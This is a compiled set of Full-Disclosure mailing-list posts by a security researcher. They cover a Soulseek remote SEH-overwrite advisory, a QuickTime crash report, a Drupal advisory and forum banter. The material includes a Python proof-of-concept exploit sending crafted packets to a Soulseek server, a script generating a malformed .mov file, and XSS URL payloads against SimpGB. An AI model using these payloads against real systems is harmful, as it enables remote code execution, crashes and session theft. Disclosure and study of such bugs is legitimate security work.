> Do you have any familly relationship with jeremy Brown ? ;P
>
>
> http://g-laurent.blogspot.com/2009/05/soulseek-p2p-remote-distributed-search.html#comments
>
> 2009/5/25 Pete Licoln 
>
>  Oh so you have a blog ...
>> http://g-laurent.blogspot.com/
>>
>> 2009/5/25 laurent gaffie 
>>
>>>  =
>>> - Release date: May 24th, 2009
>>> - Discovered by: Laurent Gaffié
>>> - Severity: critical
>>> =
>>>
>>> I. VULNERABILITY
>>> -
>>> Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution
>>>
>>> II. BACKGROUND
>>> -
>>> "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
>>>
>>> sharing application.
>>> One of the things that makes Soulseek(tm) unique is our community and
>>> community-related features.
>>> Based on peer-to-peer technology, virtual rooms allow you to meet people
>>> with
>>> the same interests, share information, and chat freely using real-time
>>> messages
>>> in public or private.
>>> Soulseek(tm), with its built-in people matching system, is a great way to
>>> make
>>> new friends and expand your mind!"
>>>
>>> III. DESCRIPTION
>>> -
>>> Soulseek client allows distributed file search to one person, everyone,
>>> or in a
>>> specific Soulseek IRC channel, allowing a user to find the files he
>>> wants, in
>>> a dedicated channel, or with his contacts, or on the whole network.
>>> Unfortunatly this feature is vulnerable to a remote SEH overwrite to a
>>> specific
>>> user, or even to a whole Soulseek IRC channel.
>>>
>>> IV. PROOF OF CONCEPT
>>> -
>>> This proof of concept is made to prevent a S-K party, it is only build to
>>>
>>> target the user "testt4321".
>>>
>>> To try this proof of concept, you would have to open a soulseek client
>>> and use
>>> the username:
>>> "testt4321"
>>> with the password:
>>> "12345678"
>>> And launch this code.
>>> If you want to change the username or target a whole channel, you would
>>> have
>>> to reverse the binary protocol
>>>
>>>
>>>
>>> #!/usr/bin/python
>>> import struct
>>> import sys, socket
>>> from time import *
>>>
>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>>> s.connect(("208.76.170.50",2242))  # Change to Port 2240 for 156* branch
>>>
>>> buffer =
>>> "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
>>> buffer+=
>>> "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
>>> buffer+=
>>> "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
>>> buffer+=
>>> "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
>>> buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"
>>>
>>> s.send(buffer)
>>> sleep(1)
>>>
>>> junk = "\x41" * 3084
>>> next_seh = struct.pack('>> seh =  struct.pack('>> other_junk = "\x61" * 1423
>>>
>>> buffer2 =
>>> "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
>>> buffer2+=
>>> "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
>>> s.send(buffer2)
>>> sleep(1)
>>> s.recv(1024)
>>>
>>>
>>>
>>> After the query is send, the memory will look like this
>>> 0012FBE4   41414141
>>> 0012FBE8   42424242  Pointer to next SEH record
>>> 0012FBEC   43434343  SE handler
>>> 0012FBF0   61616161
>>>
>>> And the program will terminate with this stru

Re: [Full-disclosure] Apple QuickTime 0day

[laurent gaffie]

Hi WebDEVIL,

You base your PoC on this plugin (http://www.codeplex.com/msecdbg) for
windbg (as copy/pasted), but i wonder, what make you think it's really
exploitable (on quicktime) ?
Have you tried that PoC on Itunes ?
Itunes, use Quicktime as a module to read .mov files, but Itunes doesn't
have the same memory protection than Quicktime, for example see :
http://milw0rm.com/exploits/7296 , it still works on the last one today
[Itunes 8.2.0.23]

What do you get with your Poc when you play with it on Itunes ?

Thanks





2009/6/15 webDEViL 

> Try it with your latest quicktime player.
> --
>
> #0:000> !exploitable -v
> #HostMachine\HostUser
> #Executing Processor Architecture is x86
>
> #Debuggee is in User Mode
> #Debuggee is a live user mode debugging session on the local machine
> #Event Type: Exception
> #Exception Faulting Address: 0x66830f9b
> #First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC0FD)
>
> #
> #Faulting Instruction:66830f9b push ebx
> #
> #Basic Block:
> #66830f9b push ebx
> #   Tainted Input Operands: ebx
> #66830f9c push ebp
> #66830f9d mov ebp,dword ptr +0x41f (0420)[esp]
>
> #66830fa4 push esi
> #66830fa5 push edi
> #66830fa6 mov edi,ecx
> #66830fa8 cmp edi,offset +0x5ff (0600)
> #66830fae mov ebx,edx
> #66830fb0 mov dword ptr [esp+14h],eax
>
> #66830fb4 mov byte ptr [esp+10h],0
> #66830fb9 mov byte ptr [esp+11h],0
> #66830fbe mov byte ptr [esp+12h],0
> #66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4)
> #
> #Exception Hash (Major/Minor): 0x614b6671.0x614b786e
>
> #
> #Stack Trace:
> #QuickTime!DllMain+0x2fabb
> #+0x1231137
> #Instruction Address: 0x66830f9b
> #
> #Description: Stack Overflow
> #Short Description: StackOverflow
> #Exploitability Classification: UNKNOWN
>
> #Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb 
> (Hash=0x614b6671.0x614b786e)
>
> print "--"
> print "w3bd3vil [at] gmail [dot] com"
> print "Apple QuickTime CRGN Atom 0day"
>
> print "--"
> bytes = [
> 0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70,
> 0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67,
> 0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00,
>
> 0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00,
> 0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02,
> 0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
>
> 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
>
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
> 0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B,
> 0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF,
>
> 0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
>
> 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00,
> 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63,
>
> 0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00,
> 0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00,
>
> 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72,
> 0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ]
>
> f = open("webDEViL.mov", "wb")
> for byte in bytes: f.write("%c" % byte)
>
> f.close()
> print "webDEViL.mov created! (%d bytes)" % len(bytes)
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Security-news] SA-CORE-2012-004 - Drupal core - Multiple vulnerabilities

[laurent gaffie]

In regards to the code exec;
Ever heard of whitelisting ?
Le 19 déc. 2012 14:39,  a écrit :

> View online: http://drupal.org/SA-CORE-2012-004
>
>   * Advisory ID: DRUPAL-SA-CORE-2012-004
>   * Project: Drupal core [1]
>   * Version: 6.x, 7.x
>   * Date: 2012-December-19
>   * Security risk: Moderately critical [2]
>   * Exploitable from: Remote
>   * Vulnerability: Access bypass, Arbitrary PHP code execution
>
>  DESCRIPTION
> -
>
> Multiple vulnerabilities were fixed in the supported Drupal core versions 6
> and 7.
>
>  Access bypass (User module search - Drupal 6 and 7)
>
> A vulnerability was identified that allows blocked users to appear in user
> search results, even when the search results are viewed by unprivileged
> users.
>
> This vulnerability is mitigated by the fact that the default Drupal core
> user
> search results only display usernames (and disclosure of usernames is not
> considered a security vulnerability [3]). However, since modules or themes
> may override the search results to display more information from each
> user's
> profile, this could result in additional information about blocked users
> being disclosed on some sites.
>
> CVE: Requested.
>
>  Access bypass (Upload module - Drupal 6)
>
> A vulnerability was identified that allows information about uploaded files
> to be displayed in RSS feeds and search results to users that do not have
> the
> "view uploaded files" permission.
>
> This issue affects Drupal 6 only.
>
> CVE: Requested.
>
>  Arbitrary PHP code execution (File upload modules - Drupal 6 and 7)
>
> Drupal core's file upload feature blocks the upload of many files that can
> be
> executed on the server by munging the filename. A malicious user could
> name a
> file in a manner that bypasses this munging of the filename in Drupal's
> input
> validation.
>
> This vulnerability is mitigated by several factors: The attacker would need
> the permission to upload a file to the server. Certain combinations of PHP
> and filesystems are not vulnerable to this issue, though we did not perform
> an exhaustive review of the supported PHP versions. Finally: the server
> would
> need to allow execution of files in the uploads directory. Drupal core has
> protected against this with a .htaccess file protection in place from
> SA-2006-006 - Drupal Core - Execution of arbitrary files in certain Apache
> configurations [4]. Users of IIS should consider updating their web.config
> [5]. Users of Nginx should confirm that only the index.php and other known
> good scripts are executable. Users of other webservers should review their
> configuration to ensure the goals are achieved in some other way.
>
> CVE: Requested.
>
>
>  CVE IDENTIFIER(S) ISSUED
> 
>
>   * /A CVE identifier [6] will be requested, and added upon issuance, in
> accordance with Drupal Security Team processes./
>
>  VERSIONS AFFECTED
> ---
>
>   * Drupal core 6.x versions prior to 6.27.
>   * Drupal core 7.x versions prior to 7.18.
>
>  SOLUTION
> 
>
> Install the latest version:
>
>   * If you use Drupal 6.x, upgrade to Drupal core 6.27 [7].
>   * If you use Drupal 7.x, upgrade to Drupal core 7.18 [8].
>
> Also see the Drupal core [9] project page.
>
>  REPORTED BY
> -
>
>   * The access bypass issue in the User module search results was reported
> by
> Derek Wright [10] of the Drupal Security Team.
>   * The access bypass issue in the Drupal 6 Upload module was reported by
> Simon Rycroft [11], and by Damien Tournoud [12] of the Drupal Security
> Team.
>   * The arbitrary code execution issue was reported by Amit Asaravala [13].
>
>  FIXED BY
> 
>
>   * The access bypass issue in the User module search results was fixed by
> Derek Wright [14], Ivo Van Geertruyen [15], Peter Wolanin [16], and
> David
> Rothstein [17], all members of the Drupal Security Team.
>   * The access bypass issue in the Drupal 6 Upload module was fixed by
> Michaël Dupont [18], and by Fox [19] and David Rothstein [20] of the
> Drupal Security Team.
>   * The arbitrary code execution issue was fixed by Nathan Haug [21] and
> Justin Klein-Keane [22], and by John Morahan [23] and Greg Knaddison
> [24]
> of the Drupal Security team.
>
>  COORDINATED BY
> --
>
>   * Jeremy Thorson [25] QA/Testing infrastructure
>   * Ben Jeavons [26] of the Drupal Security Team
>   * David Rothstein [27] of the Drupal Security Team
>   * Gábor Hojtsy [28] of the Drupal Security Team
>   * Greg Knaddison [29] of the Drupal Security Team
>   * Fox [30] of the Drupal Security Team
>
> 

[Full-disclosure] SANS PHP Port Scanner Remote Code Execution

[laurent gaffie]

http://resources.infosecinstitute.com/php-build-your-own-mini-port-scanner/

Finding the vulnerability in this code is left as an exercise to the reader.

PS: "*Your comment will be awaiting moderation forever."*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution

[laurent gaffie]

Question is not about someone making a mistake, everyone make mistakes one
day or another. Question is about not even doing Q.A on a corporate blog
post (contribution or not) where you sells training @5k for B.S certs.

2013/3/5 Harry Hoffman 

> lolz, that's great! I guess it shouldn't be surprising, he's a
> undergrad. But even most grad students make these sorts of mistakes...
> academicware ;-)
>
> Cheers,
> Harry
>
> On 03/05/2013 08:46 PM, laurent gaffie wrote:
> >
> http://resources.infosecinstitute.com/php-build-your-own-mini-port-scanner/
> >
> > Finding the vulnerability in this code is left as an exercise to the
> reader.
> >
> > PS: "*Your comment will be awaiting moderation forever."*
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Why PRISM kills the cloud | Computerworld Blogs

[laurent gaffie]

Why is the Prims program such a big deal today?  Most of us  knew about
echellon and the patriot act didnt we? This program was unconstinutional at
the first place and should have raised indignation when it was approved at
that time...

Seems like some people spend way to much time focusing on the second
amendment rather than the first one...
Le 2013-06-10 19:46, "Ivan .Heca"  a écrit :

> http://m.blogs.computerworld.com/cloud-storage/22305/why-prism-kills-cloud
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Why PRISM kills the cloud | Computerworld Blogs

[laurent gaffie]

Freedom of speech and freedom of anonymous speech is protected by the first
amendment..

https://www.eff.org/issues/anonymity




2013/6/11 Philip Whitehouse 

>
> Seems like some people spend way to much time focusing on the second
> amendment rather than the first one...
>
> Well this relates mainly to the fourth amendment, not the first. The first
> tends to get decent coverage. Publication of the leak by journalists is the
> only under the realm of the first.
>
> Philip Whitehouse
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Dancho Danchev gone missing in Bulgaria

[laurent gaffie]

No sign at all he was crazy at the first place;
Question *could be* why is he supposed to be in a psyco hospital by now ?
Anyways, who is the source on that one ?
Who have a clue, and on what do we rely to have an opinion ?
_Blah_ we'll probably never know.
Sounds like classic stuff here.


2011/1/18 Juha-Matti Laurio 

> He has been found:
> http://news.ycombinator.com/item?id=2112135
>
> via
> http://twitter.com/#!/mikkohypponen/status/27006162218000384
>
> Juha-Matti
>
> Jamie Riden [jamie.ri...@gmail.com] kirjoitti:
> > On 16 January 2011 22:28, jf  wrote:
> > > On Sat, Jan 15, 2011 at 07:45:30PM +, Joe Average wrote:
> > >> Via ZDNet:
> > >>
> > >> "Zero Day blogger and malware researcher Dancho Danchev has gone
> > >> missing since August last year and we have some troubling information
> > >> that suggests he may have been harmed in his native Bulgaria."
> > >>
> > >> "Dancho, who was relentless in his pursuit of cyber-criminals, last
> > >> blogged here on August 18.  His personal blog has not been updated
> > >> since September 11, 2010."
> > >>
> > >> More Information:
> > >>
> http://www.zdnet.com/blog/security/we-need-help-with-the-strange-disappearance-of-dancho-danchev/7897
> > >
> > > In soviet bulgaria, you not research malware author, malware author
> research you.
> >
> > Bulgaria joined the European Union in 2007 - see
> > http://europa.eu/abc/european_countries/eu_members/bulgaria/index_en.htm
> > Sorry to spoil the joke, but it's not like you can be disappeared at
> > will in Bulgaria these days.
> >
> > I met Dancho a couple of years ago, btw - nice bloke, and we'd all
> > like to know he's safe and well.
> >
> > cheers,
> >  Jamie
> > --
> > Jamie Riden / ja...@honeynet.org / jamie.ri...@gmail.com
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Multiple vulnerabilities in SimpGB

[laurent gaffie]

Send your shitty stuff to bugt...@securityfocus.com

If it's not obvious, no one give a shit here, seriously.


2011/1/27 MustLive 

> Hello list!
>
> I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
> Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.
>
> -
> Affected products:
> -
>
> Vulnerable are SimpGB v1.49.02 and previous versions.
>
> --
> Details:
> --
>
> XSS (WASC-08):
>
> POST request at page http://site/guestbook.php in parameters poster,
> postingid and location in Preview function. If captcha is using in
> guestbook, then working code of the captcha is required for the attack. Or
> via GET request:
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=11&preview=preview
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=11&preview=preview
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=11&preview=preview
>
> Brute Force (WASC-11):
>
> http://site/admin/index.php
>
> Insufficient Anti-automation (WASC-21):
>
> http://site/admin/pwlost.php
>
> In this functionality there is no protection from automated requests
> (captcha).
>
> Abuse of Functionality (WASC-42):
>
> http://site/admin/pwlost.php
>
> In this functionality it's possible to retrieve logins.
>
> 
> Timeline:
> 
>
> 2010.11.17 - announced at my site.
> 2010.11.19 - informed developers.
> 2011.01.25 - disclosed at my site.
>
> I mentioned about these vulnerabilities at my site
> (http://websecurity.com.ua/4690/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] www.google.com xss vulnerability Using mhtml

[laurent gaffie]

Not a google vuln.
Hunt down MSFT to pay for your bug.
Oh wait they dont pay for free research.. 0noz, you wont get any candy !

2011/1/27, IEhrepus <5up3r...@gmail.com>:
> Security is a general,Many security issues are composed of many
> different vulnerabilities of different factory.
>
> like " mhtml:http://www.google.com/gwt/n?u=[mhtml file url]! " this vul
>
> 
> so we come back this vul need two Conditions
> 1.www.google.com app don't filter the CRLF
> 2.IE support mhtml protocol handler to render the mhtml file format,
> and this is the why mhtml: is designed
> --
>
> Both are indispensable. so google's vul is  that don't take into
> account the security implications using mhtml,
>
> the MS vul is that "it does not honor Content-Type and related headers
> (or even "nosniff")." like MZ saiy
>
> GG and MS ,both are vul...
>
> in addition, if MS saiy this is mhtml: 's original function, So google
> is very dangerous to the user who using IE
>
> Even if MS fixed it. how about the google users who do not have time
> to upgrade IE ?
>
> by superhei
> hitest
>
>
>
> 2011/1/26 Michal Zalewski :
>>> 1.www.google.com app don't filter the CRLF
>>
>> This is not strictly required; there are other scenarios where this
>> vulnerability is exploitable.
>>
>>> 2.IE support mhtml protocol handler to render the mhtml file format,
>>> and this is the why mhtml: is designed
>>
>> The real problem is that when mhtml: is used to fetch the container
>> over an underlying protocol, it does not honor Content-Type and
>> related headers (or even "nosniff").
>>
>> /mz
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Multiple vulnerabilities in SimpGB

[laurent gaffie]

Hey Sparky,

One of the many many thing you didn't understand during the past 5 years is
that you should probably try to identify and fix your stuff on *your*
website, before spamming this ML with your crap.
cf:
http://www.zone-h.org/mirror/id/11367858

e-tard.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Turning SMB client side bug to server side

[laurent gaffie]

Here's a small technic to compromise via a SMB client side bug the PDC/DMB
by abusing the Browser protocol,  with no user interaction at all.

Browser and NBNS abusing is well known since a long time, as theses
protocols wasn't developed with security in mind, this blog post is a simple
real case example.

http://g-laurent.blogspot.com/2010/04/turning-smb-client-bug-to-server-side.html

Regards,
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Python fuzzing lib released

[laurent gaffie]

I'm please to release this python fuzzing lib I've been working on for a
couple month, works perfectly for any layer * fuzzing.
Works even better on layer 5 fuzzing which allows you to not care about many
thing you should care about when fuzzing underlayer protocols...
This lib is pretty usefull from my point of view, and could be wisely used
for any project;
http://g-laurent.blogspot.com/2010/05/fuzzing-lib-released.html

Enjoy  :)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DoS vulnerability in Internet Explorer

[Laurent Gaffie]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hello Full-Disclosure!

I want to warn you about a Denial of Service in every browser finaly !!!

It actually affect every browser with a javascript engine  build in !!!

Adobe may be vulnerable to 

PoC :


0n0z


for (i=0;i<65535;i++) {
  alert('0n0z mustlive got you, now you're fucked, the only solution
is to restart your browser or be faster than JS !!!');
}




Greetz to mustl...@oswap.com.ua


On 01/06/10 22:42, MustLive wrote:
> Hello Full-Disclosure!
>
> I want to warn you about Denial of Service vulnerability in
> Internet Explorer. Which I already disclosed at my site in 2008 (at
> 29.09.2008). But recently I made new tests concerning this
> vulnerability, so I decided to remind you about it.
>
> I know this vulnerability for a long time - it's well-known DoS in
> IE. It works in IE6 and after release of IE7 I hoped that Microsoft
> fixed this
hole
> in seventh version of the browser. But as I tested at 29.09.2008,
> IE7 was also vulnerable to this attack. And as I tested recently,
> IE8 is also vulnerable to this attack.
>
> Also I informed Microsoft at 01.10.2008 about it, but they ignored
> and didn't fix it. They didn't fix the hole not in IE6, nor in IE7,
> nor in IE8.
>
> That time I published about this vulnerability at SecurityVulns
> (http://securityvulns.com/Udocument636.html).
>
> DoS:
>
> Vulnerability concerned with handling by browser of expression in
> styles, which leads to blocking of work of IE.
>
> http://websecurity.com.ua/uploads/2008/IE%20DoS%20Exploit4.html
>
> Vulnerable versions are Internet Explorer 6 (6.0.2900.2180),
> Internet Explorer 7 (7.0.6000.16711), Internet Explorer 8
> (8.0.7600.16385) and previous versions.
>
> To Susan Bradley from Bugtraq:
>
> This is one of those cases, which I told you before, when browser
> vendors ignore to fix DoS holes in their browsers for many years.
>
> Best wishes & regards, MustLive Administrator of Websecurity web
> site http://websecurity.com.ua
>
> ___ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJMBREZAAoJEEESJ0AJ05HwfboP/iKyZAkaZk1xE17ExXkRDvfE
7Adra0Zf2RE6diDzK6FegUXyOQok9zYMTU+akx9OoxyC3zF1RWJQMWZAZEq3KpNp
AmUmrTaS46mXWeZfUomDbdKHJq3LZtlD4K4BDkOU/T4gvAFF9BRdRetawm4aEwMB
JQ3Qp8jMnv+wLGxfAoTUS0bTaXWjxPdf2SEfgwvZdnpY9HYDft+/qKHbPBJeK2oi
A8zTirz/9UeoJDnq2hTvyeONVsOn6rAdvPzrag3e5vq77fbpbHtxVA8OfYUgiEGp
KsKiNmrTMVHxvwaHrRPxQkpmzNDx7R84l693xbOkiS1pm0Zq4A0CiZEuvU8H/FBd
XuKWkeR35H7RF42E5iVo/E3MFJkT+sBtqJdFigKJSIge/Y2omqbKsyVTG20SF5s0
l/zHJqyZgYl5c8qMrKrvNyglbYgpYRKwIa1wYsHbimNJWho32lc8bU8xY6nQEZ+z
H1SXer6B9bDJV9hSBGxQuACYBXzzKMeB2tom4DpoH789gZ0tsQp0H9lQbji61PlK
kUKM0pGw0MKMjzGOXH7qjEo0eHaQhhr6PnCTOVofXARX5pmXRFxAdJe8dG3VTOqO
llrbFxenJJTrmSv8YPHuiZT5QUledpXmpIi2eegjzxwGwpPmXbAoqg9QaVJ501Yv
mpMV1kIb911r6Ps4UhGp
=n3v/
-END PGP SIGNATURE-



0x09D391F0.asc
Description: application/pgp-keys


0x09D391F0.asc
Description: application/pgp-keys


0x09D391F0.asc
Description: application/pgp-keys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DoS vulnerability in Internet Explorer

[Laurent Gaffie]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Sorry Mustlive,
i understand you need to see this in clear text finaly.
I guess ascii is the best to communicate with you;


Hello Full-Disclosure!

I want to warn you about a Denial of Service in every browser finaly !!!

It actually affect every browser with a javascript engine  build in !!!

Adobe may be vulnerable to 

PoC :


0n0z


for (i=0;i<65535;i++) {
alert('0n0z mustlive got you, now you're fucked, the only solution is
to restart your browser or be faster than JS !!!');
}





Greetz to mustl...@oswap.com.ua

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJMBRJkAAoJEEESJ0AJ05HwJpYQAI84bDG8fNbq4lYjomqD3+Wf
29VzhaQt39FF2ERwh7sDYkc5wdw/DWfAC5SpwdVtr/0wDW0dyZV36RfJyUixysce
weKx5wztjjwzk4yQF61v8DXz7MEWLhuYv9fTGcw9LKpnDm9/Z0YZ6ObKp8dE9A11
1E4xzAByLYpEdTQyxosMsJ336oJgTc3NrjDiPJGoxOb65epLlc07aEaP7ZA7jE/J
i+M0ukNl8CKAryGs8DhDf+5fkJf1wcqOUoxK4mJ4nPe0IhhoQ+FUizB04E7MpK8P
OisvgW8I6tdGurJTfux14Jj6NZXBuL0ww65e3vfgOrm8WRtKPrbwiRd1nk8NqsCC
Nz5UBxEr32YhEUdgoXPj8ZleBbvLL0z0PVoRtbBSyKABih8OUwPMUpa0WkpMno+x
gcG7vmO/bIr5wEjRGlK9NglCMqKNWzRk2f03KGIM2MMetB7KLvR/Kir3rL2n8a4k
nLj/EYRm4orHzIDtR/Fr8LixJPr1wwpi53OOPJEcpjDvud4sOKcfUPSb7cckc7wQ
vBPCNjPZ1D8V3GzJhE7+NHVVl8wUDwKodu0ejDmzJ2K7L1nLDiI9GStA8Xof98ne
4ZBLA3lCRsbcYDdE0cvqwMa+xyx7KUcMy5M8vimyTGpIhnFF2+ScdFgFzrDIEtNH
g+1w9Kvgr12i+aEmD2Me
=v3oL
-END PGP SIGNATURE-



0x09D391F0.asc
Description: application/pgp-keys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Hash

[laurent gaffie]

Bonjour Fionnbharr Davies!,

I'm glad to make your life easier with the shasum full path, really.

Regarding the "Grossly misdiagnosed bug";
That's some funny words to describe one of the most difficult bug to exploit
in 2009 (http://seclists.org/dailydave/2009/q4/2)




Laurent


Bonjour!

Is this going to be another grossly misdiagnosed bug?

Also I'm glad you put that /usr/bin at the start, it would have been
confusing otherwise.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Windows 7 , Server 2008R2 Remote Kernel Crash

[laurent gaffie]

=
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=

